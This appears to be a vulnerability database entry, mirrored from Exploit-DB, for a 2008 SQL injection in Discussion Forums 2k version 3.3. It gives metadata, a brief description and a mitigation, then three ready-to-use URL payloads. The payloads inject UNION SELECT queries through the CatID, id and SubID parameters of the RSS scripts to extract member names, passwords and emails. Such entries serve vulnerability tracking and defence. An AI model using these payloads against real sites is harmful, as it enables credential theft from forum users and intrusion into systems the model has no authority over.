Discussion Forums 2k SQL Injection

vendor:

Discussion Forums 2k

by:

~!Dok_tOR!~

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Discussion Forums 2k

Affected Version From: 3.3

Affected Version To: 3.3

Patch Exists: NO

Related CWE: N/A

CPE: a:berlios:discussion_forums_2k

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Discussion Forums 2k SQL Injection

The Discussion Forums 2k application is vulnerable to multiple SQL injection attacks when magic_quotes_gpc is set to Off. An attacker can exploit this vulnerability by sending malicious SQL queries to the application. The malicious queries can be sent via the 'CatID', 'id', and 'SubID' parameters in the 'RSS1.php', 'RSS2.php', and 'RSS5.php' scripts respectively.

Mitigation:

Ensure that the application is not vulnerable to SQL injection attacks by setting the 'magic_quotes_gpc' parameter to 'On'.

Source

Exploit-DB raw data:

Author: ~!Dok_tOR!~
Date found: 30.09.08
Product: Discussion Forums 2k
Version: 3.3
URL: http://developer.berlios.de/projects/df2k/
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Exploit 1:

http://localhost/[installdir]/misc/RSS1.php?CatID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,3,4,5,6,7+from+DF2k_Members/*

Exploit 2:

http://localhost/[installdir]/misc/RSS2.php?id=1&CatID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,user(),4,5,6,7,8,9,10+from+DF2k_Members/*

Exploit 3:

http://localhost/[installdir]/misc/RSS5.php?SubID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,3,4,5+from+DF2k_Members/*

# milw0rm.com [2008-10-01]